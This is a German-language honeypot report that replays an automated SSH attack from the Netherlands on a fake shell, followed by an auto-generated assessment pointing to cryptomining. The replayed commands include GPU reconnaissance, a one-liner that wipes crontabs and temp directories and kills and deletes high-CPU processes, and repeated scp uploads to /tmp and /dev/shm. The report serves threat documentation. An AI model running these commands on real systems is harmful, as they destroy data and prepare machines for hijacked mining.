ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

06.10.2026, 04:08 UTC · 51 Befehle · über ssh · Niederlande

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
ecorner / guest

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
ecorner@srv01: ~

ecorner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ecorner@srv01:~$ uname -m | awk '{printf $1}'
x86_64
ecorner@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
261 days, 00:00
ecorner@srv01:~$ lspci | egrep VGA && lspci | grep 3D
01:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
02:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
03:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
04:00.0 VGA compatible controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
01:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
02:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
03:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
04:00.1 3D controller: NVIDIA Corporation GA102GL [RTX A5000] (rev a1)
ecorner@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
AMD EPYC 7443P 24-Core Processor
ecorner@srv01:~$ curl ipinfo.io/org
Cloudflare, Inc.
ecorner@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
4
ecorner@srv01:~$ nvidia-smi -q | grep "Product Name"
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
Product Name : NVIDIA RTX A5000
ecorner@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
ecorner@srv01:~$ uname -n | awk '{printf $1}'
render03
ecorner@srv01:~$ uname -r | awk '{printf $1}'
5.15.0-88-generic
ecorner@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
crontab: no crontab for Admin
rm: cannot remove '/var/tmp/.': Permission denied
rm: cannot remove '/var/tmp/..': Permission denied
rm: cannot remove '/tmp/.': Permission denied
rm: cannot remove '/tmp/..': Permission denied
ecorner@srv01:~$ echo guest > /tmp/d.log
ecorner@srv01:~$ scp -qt "/var/tmp/AbfJslry"
ecorner@srv01:~$ scp -qt "/tmp/AbfJslry"
ecorner@srv01:~$ scp -qt "/dev/shm/AbfJslry"
ecorner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ecorner@srv01:~$ echo 1234567890 > /tmp/d.log
ecorner@srv01:~$ scp -qt "/var/tmp/EdMkBvEB"
ecorner@srv01:~$ scp -qt "/tmp/EdMkBvEB"
ecorner@srv01:~$ scp -qt "/dev/shm/EdMkBvEB"
ecorner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ecorner@srv01:~$ echo vncuser > /tmp/d.log
ecorner@srv01:~$ scp -qt "/var/tmp/VjGUykGW"
ecorner@srv01:~$ scp -qt "/tmp/VjGUykGW"
ecorner@srv01:~$ scp -qt "/dev/shm/VjGUykGW"
ecorner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ecorner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ecorner@srv01:~$ echo Password > /tmp/d.log
ecorner@srv01:~$ scp -qt "/var/tmp/JRxnZmtr"
ecorner@srv01:~$ scp -qt "/tmp/JRxnZmtr"
ecorner@srv01:~$ scp -qt "/dev/shm/JRxnZmtr"
ecorner@srv01:~$ echo administrator > /tmp/d.log
ecorner@srv01:~$ scp -qt "/var/tmp/LGFiCrxX"
ecorner@srv01:~$ scp -qt "/tmp/LGFiCrxX"
ecorner@srv01:~$ scp -qt "/dev/shm/LGFiCrxX"
ecorner@srv01:~$ uname -s -v -n -r -m
Linux 5.15.0-88-generic #98-Ubuntu SMP Wed Oct 2 14:47:57 UTC 2026 x86_64
ecorner@srv01:~$ echo pass > /tmp/d.log
ecorner@srv01:~$ scp -qt "/var/tmp/QfptSZMa"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich über SSH mit schwachen Zugangsdaten an und führte eine Reihe von Systemabfragen durch, um die Hardware, insbesondere Grafikkarten, zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung, um Ressourcen freizumachen. Danach versuchte er, mehrere Dateien über SCP in verschiedene temporäre Verzeichnisse zu kopieren.

Was die Befehle bewirken

Die Befehle uname, lspci und nvidia-smi dienen der Erkennung von Betriebssystemversion und GPU-Hardware, um festzustellen, ob das System für Mining geeignet ist. Der Befehl crontab -r löscht geplante Aufgaben, während rm -rf temporäre Dateien entfernt, um Spuren zu verwischen. Der awk-basierte Prozess-Kill beendet Programme mit hoher CPU-Nutzung, um Rechenleistung für den Miner freizumachen. Die scp -qt Befehle kopieren Dateien in den Hintergrund (quiet mode) in Verzeichnisse wie /var/tmp oder /dev/shm, die oft weniger überwacht werden.

Worauf es hinauslief

Das Vorgehen deutet stark auf die Installation eines Kryptomining-Bots hin, da gezielt nach NVIDIA-Grafikkarten gesucht und die Systemauslastung manipuliert wurde. Die wiederholten SCP-Übertragungen in versteckte Verzeichnisse dienen vermutlich dem Download und der Persistenz der Mining-Software. Ob es sich um ein automatisiertes Skript oder einen manuellen Eingriff handelt, bleibt offen, ist aber bei dieser Musterung eher automatisiert.

Einordnung

Dieses Muster ist im Kontext von Kryptomining-Angriffen sehr verbreitet und folgt einem standardisierten Skriptablauf zur automatisierten Kompromittierung.